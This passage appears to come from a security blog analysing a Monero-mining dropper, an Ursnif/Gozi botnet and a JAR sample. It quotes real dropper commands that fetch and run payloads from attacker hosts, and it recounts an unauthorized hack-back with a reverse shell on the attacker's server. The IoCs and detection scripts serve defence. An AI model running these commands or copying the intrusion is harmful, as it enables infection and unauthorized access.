Thursday, September 20, 2018

Sustes Malware: CPU for Monero

Today I'd like to share a simple analysis of a fascinating threat that I like to call Sustes (you will see the name's genesis in a bit).

Everybody knows the Monero cryptocurrency, and probably everybody knows that it was built around privacy, meaning it is not that simple to figure out a Monero wallet's balance. Sustes (mr.sh) is a nice example of pirate mining, and even if it is hard to figure out its magnitude, since the attacker built up private pool proxies, I believe it is interesting to fix the wallet address in memory and to share IoCs for future protection. So, let's have a closer look at it.

Monero stops you trying to check wallet balance
Sustes does not spread by itself (it is not a worm); it is delivered through exploitation and brute-force activity with a special focus on IoT devices and Linux servers. The initial infection stage is a wget of http:\/\/192[.]99[.]142[.]226[:]8220\/mr.sh run directly on the victim machine, followed by a simple /bin/bash mr.sh. mr.sh is a plain bash script which drops and executes additional software, with a bit of spice. The following shows the mr.sh content as of today (ref. blog post date).


An initial connection check tries to take down software the attacker does not want on the victim: it lists the active connections, extracts the PID column (awk '{print $7}' | sed -e "s/\/.*//g") and directly kills (kill -9) every process talking to a specific set of IP addresses. The extracted list of "unwanted" peers is the following:
  • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
  • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
  • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
  • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
  • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
  • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
A second check looks at command-line arguments. Sustes greps the process list for configuration file names (for example wc.conf, wq.conf and wm.conf), then for process names such as sustes (here we go!) and kills everything the grep matches. The script then assigns the dropping site (192[.]99[.]142[.]226:8220) to the f2 variable and later calls f2 with specific paths appended (for example /xm64 and wt.conf) in order to drop the crafted components. mr.sh then runs the dropped software with its configuration file as follows:

nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &

mr.sh ends by installing a crontab entry that re-downloads and re-executes the script every minute:

crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1"

Following the analysis and extracting the configuration files from the dropping URL, we can observe the Monero wallet addresses and the Monero pools used by the attacker. The following wallets (W1, W2, W3) were found; note that all three configuration files carry the same address.

  • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
A quick look at the pools in use led me to believe the attacker built a custom, private Monero pool/proxy layer (deployed on his own infrastructure); for that reason I believe it is worth monitoring and/or blocking the following addresses:
  • 158[.]69[.]133[.]20 on port 3333
  • 192[.]99[.]142[.]249 on port 3333
  • 202[.]144[.]193[.]110 on port 3333 
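The two artefacts the post has just walked through, the miner configuration files and the cron line, are exactly what an incident responder wants to pull indicators from. The following script is an added example written for this post; it is not code from mr.sh and not from XMRig. It assumes the wc.conf / wq.conf / wm.conf files fetched by mr.sh use XMRig's JSON layout ("pools": [{"url": ..., "user": ..., "pass": ...}], which is what a "basic XMRIG" run with -c expects). The three configs and the crontab text are constructed for the example and reuse only the wallet, pool and dropper addresses published in the post; the Monero address test is a format check only (95 base58 characters starting with 4, or 8 for a subaddress) and does not verify the checksum.

```python
"""Pull mining IoCs out of XMRig-style configs and spot the cron re-dropper.

Added example for this post: it is not code from mr.sh and not from XMRig.
It assumes the wc.conf / wq.conf / wm.conf files fetched by mr.sh use
XMRig's JSON layout ("pools": [{"url": ..., "user": ..., "pass": ...}]).
The configs and the crontab text below are constructed for the example;
they reuse only the wallet, pool and dropper addresses published in the post.
"""
import json
import re
from urllib.parse import urlsplit

# Monero standard addresses are 95 base58 characters starting with '4'
# (subaddresses start with '8'); base58 has no 0, O, I or l. Format check
# only: the Keccak checksum in the trailing bytes is not verified here.
_BASE58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_XMR_ADDR = re.compile(r"^[48][" + _BASE58 + r"]{94}$")

# A cron line that fetches a URL and pipes it straight into sh/bash, which
# is what mr.sh installs ($LDR expands to curl or wget on the victim).
_PIPE_TO_SHELL = re.compile(r"https?://\S+\s*\|\s*(?:ba)?sh\b")


def looks_like_monero_address(value):
    return bool(_XMR_ADDR.match(value))


def pool_endpoint(url):
    """Normalise 'host:port' or 'stratum+tcp://host:port' to 'host:port'."""
    if "://" not in url:
        url = "stratum+tcp://" + url
    parts = urlsplit(url)
    if parts.hostname is None or parts.port is None:
        raise ValueError("unparseable pool url: %r" % url)
    return "%s:%d" % (parts.hostname, parts.port)


def extract_iocs(configs):
    """configs: {file name: JSON text}. Returns the wallet set, the pool set
    and any 'user' fields that do not look like Monero addresses (worth a
    second look: they may be pool logins rather than wallets)."""
    wallets, pools, odd_users = set(), set(), []
    for name, text in configs.items():
        for pool in json.loads(text).get("pools", []):
            pools.add(pool_endpoint(pool["url"]))
            user = pool.get("user", "")
            if looks_like_monero_address(user):
                wallets.add(user)
            else:
                odd_users.append((name, user))
    return {"wallets": wallets, "pools": pools, "odd_users": odd_users}


def crontab_pipe_to_shell(crontab_text):
    """Crontab lines that download something and pipe it into a shell."""
    return [line for line in crontab_text.splitlines()
            if _PIPE_TO_SHELL.search(line)]


WALLET = ("4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17"
          "D7xw1zPGyMspv8Lqwwg36V5chYg")
SAMPLE_CONFIGS = {  # constructed, XMRig-style: one wallet, three pools
    "wc.conf": json.dumps({"pools": [{"url": "158.69.133.20:3333",
                                      "user": WALLET, "pass": "x"}]}),
    "wq.conf": json.dumps({"pools": [{"url": "stratum+tcp://192.99.142.249:3333",
                                      "user": WALLET, "pass": "x"}]}),
    "wm.conf": json.dumps({"pools": [{"url": "202.144.193.110:3333",
                                      "user": WALLET, "pass": "x"}]}),
}
SAMPLE_CRONTAB = (  # constructed: one legitimate job plus the mr.sh re-dropper
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
    "* * * * * curl http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1\n"
)

if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_CONFIGS)
    print("wallets:", sorted(iocs["wallets"]))
    print("pools:  ", sorted(iocs["pools"]))
    print("cron:   ", crontab_pipe_to_shell(SAMPLE_CRONTAB))
```

On a live box you would feed extract_iocs the files found next to the sustes binary and crontab_pipe_to_shell the output of crontab -l for every user; the pool endpoints go straight into an egress block rule and the wallet into your IoC list. Note that all three constructed configs collapse to a single wallet, which is the same thing the post observed with W1, W2 and W3.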
The downloaded payload is named sustes and it is a basic XMRig, a well-known open-source miner. In this scenario it is used to make money at the expense of computer owners, abusing the infected machine to mine Monero. The following image shows the usage strings as an initial proof of the software's identity.

XMRig proof 1

Many people are currently wondering what the sustes process draining their PC resources is (for example: here, here and here). Now we have an answer: it is an unwanted miner. :D

Hope you had fun


IoC
  • IP Address:
    • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
    • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
    • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
    • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
    • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
    • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
  • Custom Monero Pools:
    • 158[.]69[.]133[.]20:3333
    • 192[.]99[.]142[.]249:3333
    • 202[.]144[.]193[.]110:3333 
  • Wallets:
    • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

Friday, August 31, 2018

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy

Today I'd like to share a full analysis path, including a kick-back attack which led me to gain full access to an entire Ursnif/Gozi botnet.

  In other words:  from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".

NB: the Federal Police has already been alerted on this topic, as well as national and international CERTs/CSIRTs (on August 26/27 2018). Attacked companies and compromised hosts should already have been reached out to. If you have had no notice about this topic until now, it means, with high probability, that you/your company are not involved in this threat. I am not going to publicly disclose the victims' IPs.

This disclosure follows an ethical disclosure procedure, which is close to responsible disclosure but focused on the incident rather than on vulnerabilities.

Since blogging is not my business (I write on my personal blog to share knowledge on cyber security), I will describe only some of the main steps that took me to own the attacker's infrastructure. I will not disclose the malware code, the malware command and control code or details on the attacker group, since I do not want to hand future attackers new malware source code ready to be used.

My entire "cyber adventure" began from a simple email carrying a .ZIP file named "Nuovo Documento1.zip" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041). Inside the ZIP was a .VBS file (sha256: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which at the time (August 21 2018) was totally unknown to VirusTotal (unknown = not yet analysed) and was ready to be started with a double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to resist simple reverse engineering, but I do like de-obfuscating hidden code (every time it is like a personal challenge). After some hard-working minutes (:D) Stage1 was totally de-obfuscated and readable in plain text. It became clear to me that Stage1 was in charge of evading three main AVs, Kaspersky Lab, Panda Security and Trend Micro, by running simple checks on the Windows registry, and of dropping and executing additional software.

Stage1. Obfuscation
Indeed, if none of the searched AVs were found on the target system, Stage1 acted as a simple downloader. The specific action performed follows:
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://englandlistings.com/pagverd75.php C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 dropped and executed a brand new PE file named rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using bitsadmin.exe, a native Microsoft program. bitsadmin.exe is a command-line tool that system administrators can use to create download or upload jobs and monitor their progress over time. This technique has been widely used by the Anunak APT during bank frauds in the past few years.

The Stage2 analysis (a huge step ahead here) brought me to an additional, brand new "drop and decrypt" stager. Stage3 introduced additional layers of anti-reverse-engineering. The following image shows the additional PE section with high entropy in it, a significant indication of decrypter activity.

Stage2. Drop and decrypt the Stage3. You might appreciate the high entropy of the added section

Indeed, Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. UPX was used to hide the real payload, so that many AV engines were not able to detect it, since the signature changed from the original payload. Finally, the unpacked payload presented many interesting features; for example it was weaponised with evasion techniques such as: timing delay (through sleep), loop delay by calling the GetSystemTimeAsFileTime API 9979141 times, BIOS version harvesting, system manufacturer information and system fingerprinting to check whether it was running in a virtual or physical environment. It installed itself in the Windows auto-run registry to gain persistence on the victim machine. The following action was performed while running in the background:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
"C:\Users\J8913~1.SEA\AppData\Local\Temp\2e6d628189703d9ad4db9e9d164775bd.exe"
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2
C:\Windows\system32\SearchIndexer.exe /Embedding
taskhost.exe SYSTEM
C:\Windows\System32\wsqmcons.exe
taskhost.exe $(Arg0)
C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\WerFault.exe -u -p 2524 -s 288
"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"
nslookup  myip.opendns.com resolver1.opendns.com
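Several of the command lines listed above are good detection material on their own: a bitsadmin transfer landing an executable in %TEMP%, a scheduled task pointing at that executable, PowerShell reading its script body back out of a registry value, an external-IP lookup through OpenDNS, deletion of the CEIP uploader task and the IE "clear tracks" calls. The script below is an added example written for this post (it is neither the malware's code nor Yoroi's tooling) that encodes those behaviours as rules and runs them over a process-creation log. It assumes each log entry is the full command line of a created process (what Sysmon event ID 1 or Windows event 4688 with command-line auditing gives you); SAMPLE_LOG is constructed from command lines quoted in the post plus two benign lines.

```python
"""Flag suspicious command lines in a process-creation log.

Added example for this post; not the malware's code and not Yoroi's tooling.
Each entry is assumed to be a full process command line (Sysmon EID 1 or
event 4688 with command-line auditing). SAMPLE_LOG is constructed from the
command lines quoted in the post plus two benign lines.
"""
import re

# (rule name, compiled pattern). A line may trip more than one rule; the
# Stage1 command line, for instance, hits both the bitsadmin and schtasks rules.
RULES = [
    ("bitsadmin_download_to_temp",
     re.compile(r"bitsadmin\b.*/transfer\b.*https?://\S+\s+\S*[\\/]temp[\\/]", re.I)),
    ("schtasks_run_from_temp",
     re.compile(r"schtasks\b.*/create\b.*/tr\s+\S*[\\/]temp[\\/]", re.I)),
    ("powershell_payload_from_registry",  # IEX over a Get-ItemProperty value
     re.compile(r"powershell\b.*invoke-expression.*get-itemproperty", re.I)),
    ("external_ip_lookup",
     re.compile(r"nslookup\s+myip\.opendns\.com", re.I)),
    ("ceip_uploader_task_deleted",
     re.compile(r"schtasks(?:\.exe)?\s+/delete\b.*customer experience improvement program", re.I)),
    ("ie_tracks_cleared",  # context-dependent: noisy on its own, telling next to the others
     re.compile(r"rundll32(?:\.exe)?\s+\S*inetcpl\.cpl,ClearMyTracksByProcess", re.I)),
]


def scan(lines):
    """Return (rule_name, line) pairs in log order, one pair per rule hit."""
    hits = []
    for line in lines:
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((name, line))
    return hits


def rule_counts(lines):
    """How often each rule fired; a quick way to triage a whole host's log."""
    counts = {}
    for name, _ in scan(lines):
        counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed log: six lines quoted from the post and two benign ones.
SAMPLE_LOG = [
    r'"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://englandlistings.com/pagverd75.php C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe',
    r"cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))",
    r"C:\Windows\system32\svchost.exe -k netsvcs",
    r"C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000",
    r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"',
    r'C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"',
    r"C:\Windows\system32\SearchIndexer.exe /Embedding",
    r"nslookup  myip.opendns.com resolver1.opendns.com",
]

if __name__ == "__main__":
    for name, line in scan(SAMPLE_LOG):
        print("%-34s %s" % (name, line[:90]))
    print(rule_counts(SAMPLE_LOG))
```

The rules deliberately key on behaviour (download into a temp directory, code pulled from a registry value) rather than on the specific file name or GUID, which the actor can change between builds; the two benign lines stay silent, and the point of rule_counts is that a single host tripping four or five of these rules in a few minutes is the signal, not any one of them.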

Stage3 finally connects back to the C2s once it has checked its own IP address. Two main C2 levels were observed:

    • C2 level_1 (for domains and IPs check the IoC section). Stage3 connects back to C2 level_1 to get weaponised. Level_1 command and controls collect information on victims and deliver plugins to expand the infection's functionality.
    • C2 level_2 (for domains and IPs check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to hand over stolen information. It is an Ursnif/Gozi and it exfiltrates user credentials by looking for specific files, grabbing the user clipboard and performing man-in-the-browser attacks against major web sites such as PayPal, Gmail, Microsoft and many online services.

So far so good. Everything looked like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, in my personal opinion, was "hand made" and pretty "young" as an implementation: plain HTML with no client-side controls, no clickjacking protection and no special login tokens. In line with Yoroi's mission (to defend its customers), I decided to go further and try to defend people and/or infected companies by getting inside the entire network and collaborating with local authorities to shut it down, gathering as much information as possible in order to help federal and local police fight cyber crime.

Fortunately I spotted a file inclusion vulnerability in the command and control, which got me in! The following image shows a reverse shell I spawned on the attacker's command and control.

Reverse Shell On C2 Stage_1

Now I was able to download the entire command and control source code (PHP) and study it! The study of this brand new C2 took me to the next level. First of all I was able to get access to the local database, where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image shows that the downloaded command and control system has Macedonian (Cyrillic script) text in it, in line with the Anunak APT report made by Group-IB.

Command and Control Source Code (snip)
The following image is a simple screenshot of the database dump with victim IPs (undisclosed for privacy reasons).

C2 level_1 Database 

Additional investigation on the database brought up newly connected IPs: those IPs were querying the MySQL instance with administrative rights. At least two additional C2 layers were present. While level_1 was weaponising the malware implant, level_2 was collecting information from victims. Studying the source code made it possible to find more 0-days to use against the C2 in order to break into C2 level_2. Now I was able to see encrypted URLs coming from infected hosts. Important steps ahead are intentionally missing. Among many URLs the analyst was able to spot a "test" connection from the attacker and focus on decrypting that one. Fortunately everything needed was written in the command and control source code; in particular, the following function was fundamental to get to clear text!

URL Decryption Function
The eKey was stored straight in the DB and the decryption function was quite easy to reverse. Finally it was possible to figure out how to decrypt the attacker's test string (the first transaction available in the logs) and voilà, it was possible to check in to the attacker's email :D!

Attacker eMail: VPS credentials
Once "in", a new need came up: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure it was possible to get access to the entire VPS control panel. At this point the general infrastructure picture* was clear, and so was how to block the threat, not only for customers but for everybody!

Attacker VPS Environment

Sharing these results for free lets vendors (for example AV, firewall and IDS companies and so on) update their signatures and block this threat for everybody around the world. I am sure this work will not stop malicious actors, BUT at least we can raise our voice against cyber criminals!

Summary:
In this post I described the main steps that took me to gain access to a big Ursnif/Gozi botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions were performed on the attacker infrastructure). The threat appeared very well structured: Docker containers were adopted to automate deployment of the malicious infrastructure and the code was quite well engineered. Many layers of command and control were found, and the entire infrastructure was probably set up by a criminal organisation rather than a single person.

The following graph shows the victim distribution in August 2018. The main target is the USA with 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims in August 2018 number several thousand.


Victims Distribution on August 24 2018

During the analysis it was interesting to observe that the attacker was acquiring domains from an apparent "black market" where many actors were selling and buying apparently compromised domains (no evidence on this last point, only a feeling). The system (following picture) looks like a trading platform with a public API that third-party systems can operate, much like stock trading platforms.

Apparent Domain BlackMarket

Hope you enjoyed the reading.


IoCs:
Following is a list of interesting artefacts that would be helpful to block and prevent the described threat.

Hashes:
  • 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d (.vbs)
  • 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041 (Nuovo Documento1.zip)
  • 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c (rEOuvWkRP.exe)
  • 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e (Stage 3.exe)
Windows Services Names:
  • WSearch
  • WerSvc
Involved eMails:
  • 890808977777@mail.ru
  • willi12s@post.com
Involved IPs:
  • 198[.]54[.]116[.]126 (Dropper Stage 2)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]212[.]47[.]9 (C2 level_1)
  • 52[.]151[.]62[.]5 (C2 level_1)
  • 185[.]154[.]53[.]185 (C2 level_1)
  • 185[.]212[.]44[.]209 (C2 level_1)
    • 185[.]158[.]251[.]173 (General Network DB)
  • 185[.]183[.]162[.]92 (Orchestrator CPANEL)

Involved Domains:
  • http://englandlistings[.]com/pagverd75.php (Dropper Stage 2)
  • https://pool[.]jfklandscape[.]com  (C2 level_1)
  • https://pool[.]thefutureiskids[.]com (C2 level_1)
  • https://next[.]gardenforyou[.]org (C2 level_1)
  • https://1000numbers[.]com (C2 level_1)
  • https://batterygator[.]com (C2 level_1)
  • https://beard-style[.]com (C2 level_1)
  • https://pomidom[.]com (C2 level_1)
  • http://upsvarizones[.]space/ (C2 level_1)
  • http://romanikustop[.]space/ (C2 level_1)
  • http://sssloop[.]host/ (C2 level_1)
  • http://sssloop[.]space/ (C2 level_1)
  • http://securitytransit[.]site/ (Orchestrator CPANEL)

*Actually it was not the whole network, a couple of external systems were investigated as well.

Monday, August 20, 2018

Interesting hidden threat since years ?

Today I'd like to share the following reverse engineering path, since it ended up being more complex than I thought. The full path took me hours of work, and the sample covers many obfuscation steps and implementation languages. At analysis time only very few antivirus engines (6 out of 60) were able to "detect" the sample. Actually none really detected it: some AVs triggered a "generic unwanted software" signature without being able to really figure it out. As usual I am not going to show you who was able to detect it compared to who was not, since I do not want to end up with wrong declarations such as (for example): "Marco said that X is better than Y". Anyway, having the file hash should be enough to search for such information.

AntiVirus Coverage


The sample (SHA256: e5c67daef2226a9e042837f6fad5b338d730e7d241ae0786d091895b2a1b8681) presents itself as a JAR file. The first thought you might have as an experienced malware reverse engineer would be: "OK, another byte-code reversing night, easy... just focus and debug it...". BUT surprisingly, when you decompile the sample you read the following class!

Stage1: JAR invoking JavaScript
A Java method that invokes (through eval) an embedded JavaScript file! This is totally interesting stuff :D. Let's follow up on the stages and see where it goes. The extracted JavaScript (stage 2) looks like the following image. The "OOoo00" obfuscation technique has been used. Personally I do not like this obfuscation technique: it is harder to reverse than other obfuscation techniques, even Ctrl-F gets confused by substrings, but we need to figure out what it does, so let's try to manually substitute every string while watching out for matching substrings (in other words, %s/OOoo00/varName/g won't work at all, since it also rewrites OOoo00 inside longer names).

Stage 2: evaluated Javacript (obfuscated)
Manual substitution takes "forever" if you do not have a substitution framework which asks you for a string, replaces that exact string (and not a substring) and finally presents the new beautified JavaScript. After many substitutions (I really have no idea how many :D) you land on a quite readable JavaScript like the following one (click on it to make it bigger).

Stage 2: Manually Deobfuscated JavaScript
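The substitution helper described above, whole-token replacement that a plain substring search-and-replace cannot do, is short enough to show. The following script is an added example written for this post; it is not the malware's code and not the author's own tool. The SAMPLE_JS is constructed to imitate the OOoo00 style (the real Stage 2 is not reproduced), and the tokenizer is deliberately minimal: it recognises string literals, comments and identifiers so that a name occurring inside a string or a comment is left untouched, but it does not handle regex literals or template strings.

```python
"""Rename look-alike identifiers (OOoo00, OOoo00O, ...) by whole token.

Added example for this post; not the malware's code and not the author's
tooling. SAMPLE_JS is constructed to imitate the 'OOoo00' style. Strings and
comments are passed through untouched, which is the point: a substring
replace would also rewrite the OOoo00 that sits inside the string literal.
"""
import re

# One token at a time. Only the 'ident' group is a rename candidate; string
# literals and comments are matched so they are copied through unchanged.
# (Regex literals and template strings are not handled.)
TOKEN = re.compile(
    r'"(?:\\.|[^"\\\n])*"'                      # double-quoted string
    r"|'(?:\\.|[^'\\\n])*'"                     # single-quoted string
    r"|//[^\n]*"                                # line comment
    r"|/\*.*?\*/"                               # block comment
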